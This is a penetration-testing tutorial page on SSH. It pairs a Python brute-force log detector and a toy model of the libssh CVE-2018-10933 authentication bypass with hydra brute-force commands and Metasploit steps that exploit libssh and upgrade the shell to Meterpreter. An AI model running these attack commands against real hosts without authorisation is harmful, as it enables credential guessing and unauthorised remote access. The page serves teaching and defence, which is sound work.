# SSH

SSH (Secure Shell) is a protocol for remote login and administration of servers and network devices. It is the **successor to Telnet**, which sends everything, including passwords, in cleartext, and it provides **encryption**, integrity protection and server authentication (host keys), so traffic cannot be read or tampered with in transit.

By default, SSH listens on **TCP port 22**, but it can be configured to use any other TCP port, so a version scan is more reliable than assuming the port. The two authentication methods you will meet most often are:

* **Username and password authentication** – The client sends a valid username and password to the server.
* **Key-based authentication** – The client proves possession of a private key whose public half is listed in the account's `authorized_keys` file; no reusable secret crosses the wire.

If an SSH server accepts **password authentication**, an attacker can run a **brute-force** or dictionary attack to guess valid credentials and gain unauthorized access. sshd throttles this (OpenSSH's `MaxAuthTries` limits attempts per connection and `MaxStartups` limits concurrent unauthenticated connections), which is why the tools below are run with only a few parallel tasks.
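The counterpart to the attack above is spotting it in sshd's log. The following Python script is a worked example added here, not part of the original page: it parses the `Failed password` / `Accepted ...` lines sshd writes to `/var/log/auth.log` (or `journalctl -u ssh`), flags a source address that exceeds a failure threshold inside a time window, and separately flags a success that follows a burst of failures, which is what a successful hydra run looks like from the server side. The log lines, hostname and addresses are constructed, and the thresholds are assumptions to tune per host.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of the syslog-format lines sshd writes (hostname and
# addresses are made up; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
Mar  3 10:15:01 bastion sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51024 ssh2
Mar  3 10:15:02 bastion sshd[1203]: Failed password for root from 203.0.113.5 port 51030 ssh2
Mar  3 10:15:03 bastion sshd[1205]: Failed password for root from 203.0.113.5 port 51036 ssh2
Mar  3 10:15:04 bastion sshd[1207]: Failed password for root from 203.0.113.5 port 51042 ssh2
Mar  3 10:15:05 bastion sshd[1209]: Failed password for invalid user test from 203.0.113.5 port 51048 ssh2
Mar  3 10:15:09 bastion sshd[1215]: Accepted password for root from 203.0.113.5 port 51060 ssh2
Mar  3 10:16:30 bastion sshd[1230]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar  3 10:16:41 bastion sshd[1232]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2: ED25519 SHA256:u9Jd1k
"""

# Matches the authentication outcome lines only; sshd also logs disconnects,
# key fingerprints and PAM messages, which this detector ignores.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(log_text):
    """Turn raw log text into a list of auth events (dicts) in logged order."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; only differences between them are used below
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append({
            "time": ts,
            "ok": m["result"] == "Accepted",
            "method": m["method"],
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect(events, threshold=5, window_seconds=60, success_after=3):
    """Return alerts as tuples. Thresholds are assumptions; tune them for the host.

    ("bruteforce", ip, n)                 n failures from ip within window_seconds
    ("success_after_failures", ip, user)  an Accepted login from ip preceded by at
                                          least success_after failures in the window
    """
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        recent_failures = []   # failure timestamps still inside the sliding window
        already_flagged = False
        for e in evs:
            recent_failures = [t for t in recent_failures
                               if (e["time"] - t).total_seconds() <= window_seconds]
            if not e["ok"]:
                recent_failures.append(e["time"])
                if len(recent_failures) >= threshold and not already_flagged:
                    alerts.append(("bruteforce", ip, len(recent_failures)))
                    already_flagged = True
            elif len(recent_failures) >= success_after:
                alerts.append(("success_after_failures", ip, e["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

Against the sample, 203.0.113.5 trips both rules (five failures in four seconds, then `Accepted password for root`), while alice's single typo followed by a key login stays quiet. The same signal is what Fail2ban keys on; the more durable fix on the server is `PasswordAuthentication no` in `sshd_config`, which turns the whole brute-force section above into a non-issue.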

## Techniques

{% code overflow="wrap" %}

```bash
# Confirm the service and its version (SSH may not be on port 22)
nmap -sV [TARGET IP]

# Bruteforce (-t 4: few parallel tasks, sshd throttles unauthenticated connections)
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt [TARGET IP] -t 4 ssh

# Log in with a credential pair hydra reported
ssh [USER]@[TARGET_IP]
```

{% endcode %}

## Exploitation

**libssh** is a cross-platform **C library** that implements the **SSHv2 protocol** for both the **client and server** sides. It is embedded by applications that need their own SSH endpoint and is a separate code base from OpenSSH.

**libssh 0.6.0 up to 0.7.5 and 0.8.0 up to 0.8.3** (CVE-2018-10933, fixed in 0.7.6 and 0.8.4) have an **authentication bypass** in the **server code**. The server reuses the client side's packet handlers, so when a client sends `SSH2_MSG_USERAUTH_SUCCESS` (message 52) instead of `SSH2_MSG_USERAUTH_REQUEST`, the server marks the session as authenticated without ever checking a credential. The attacker then opens a channel and **executes commands** as whatever user the libssh-based application runs as. Only applications that embed libssh's server side are affected; OpenSSH servers and libssh clients are not.
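Why one out-of-place message is enough is easier to see in a small model than in the real packet flow. The Python below is an added example written for this page, not libssh's code: a toy server-side dispatcher that, like the vulnerable libssh, reuses the client's handler for `SSH2_MSG_USERAUTH_SUCCESS`, beside the hardened variant that drops the connection on any message only a server may send. Key exchange and encryption are assumed already done (every message arrives decrypted), the credential store and the `reject_client_only_messages` switch are assumptions, and the hardened branch is a simplification of the upstream fix, not a copy of it.

```python
# Message numbers from RFC 4252 (authentication) and RFC 4254 (connection).
SSH_MSG_USERAUTH_REQUEST = 50            # client -> server
SSH_MSG_USERAUTH_FAILURE = 51            # server -> client
SSH_MSG_USERAUTH_SUCCESS = 52            # server -> client only; carries no payload
SSH_MSG_CHANNEL_OPEN = 90                # client -> server, valid only once authenticated
SSH_MSG_CHANNEL_OPEN_CONFIRMATION = 91   # server -> client


class ServerSession:
    """Toy model of one server-side connection after key exchange (not libssh's code).

    reject_client_only_messages=False reproduces the vulnerable behaviour,
    True the hardened one (assumed to capture the effect of the upstream fix)."""

    def __init__(self, credentials, reject_client_only_messages):
        self.credentials = credentials            # {username: password}, constructed
        self.authenticated = False
        self.disconnected = False
        self.reject_client_only_messages = reject_client_only_messages
        # One handler table serves both roles. That is the flaw: the server now
        # "handles" USERAUTH_SUCCESS, a message only a server should ever send.
        self.handlers = {
            SSH_MSG_USERAUTH_REQUEST: self._on_userauth_request,
            SSH_MSG_USERAUTH_SUCCESS: self._on_userauth_success,
            SSH_MSG_CHANNEL_OPEN: self._on_channel_open,
        }

    def receive(self, msg_type, payload=None):
        """Dispatch one decrypted packet; return the message number sent back, or None."""
        if self.disconnected:
            return None
        if self.reject_client_only_messages and msg_type == SSH_MSG_USERAUTH_SUCCESS:
            # Hardened: a peer sending a server-only message is violating the
            # protocol; drop the connection instead of dispatching the handler.
            self.disconnected = True
            return None
        handler = self.handlers.get(msg_type)
        return handler(payload or {}) if handler else None

    def _on_userauth_request(self, payload):
        # The only legitimate way to become authenticated: present a credential.
        if self.credentials.get(payload.get("user")) == payload.get("password"):
            self.authenticated = True
            return SSH_MSG_USERAUTH_SUCCESS
        return SSH_MSG_USERAUTH_FAILURE

    def _on_userauth_success(self, payload):
        # Client-side logic ("the server told me I am logged in") executing on
        # the server side: the session is marked authenticated with no check.
        self.authenticated = True
        return None

    def _on_channel_open(self, payload):
        if not self.authenticated:
            self.disconnected = True
            return None
        return SSH_MSG_CHANNEL_OPEN_CONFIRMATION


def legitimate_login(session, user, password):
    """Normal client: USERAUTH_REQUEST, then a channel if the server said SUCCESS."""
    reply = session.receive(SSH_MSG_USERAUTH_REQUEST, {"user": user, "password": password})
    if reply != SSH_MSG_USERAUTH_SUCCESS:
        return False
    return session.receive(SSH_MSG_CHANNEL_OPEN) == SSH_MSG_CHANNEL_OPEN_CONFIRMATION


def bypass_attempt(session):
    """CVE-2018-10933 client: never send USERAUTH_REQUEST; send USERAUTH_SUCCESS
    instead and go straight to opening a channel."""
    session.receive(SSH_MSG_USERAUTH_SUCCESS)
    return session.receive(SSH_MSG_CHANNEL_OPEN) == SSH_MSG_CHANNEL_OPEN_CONFIRMATION


if __name__ == "__main__":
    creds = {"deploy": "hunter2"}   # constructed
    print("vulnerable, bypass:", bypass_attempt(ServerSession(creds, False)))   # True
    print("patched, bypass:", bypass_attempt(ServerSession(creds, True)))       # False
    print("patched, wrong password:", legitimate_login(ServerSession(creds, True), "deploy", "x"))
```

`bypass_attempt` is the message sequence the public proofs of concept and the Metasploit module send: no `USERAUTH_REQUEST` at all, just message 52 followed by a channel open. Note what the bypass does not give you: the resulting session runs as the account the libssh-based application runs as, not as a user of your choosing, and against a patched build the first message ends the connection.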

{% code overflow="wrap" %}

```bash
# Fingerprint the service; the version probe shows the libssh banner and version
nmap -sS -sV -O [TARGET]

# Inside msfconsole
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS [TARGET]
set SPAWN_PTY true
run
sessions

# Upgrade the shell session to Meterpreter (use the ID listed by `sessions`)
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
set SESSION [SESSION ID]
exploit
```

{% endcode %}
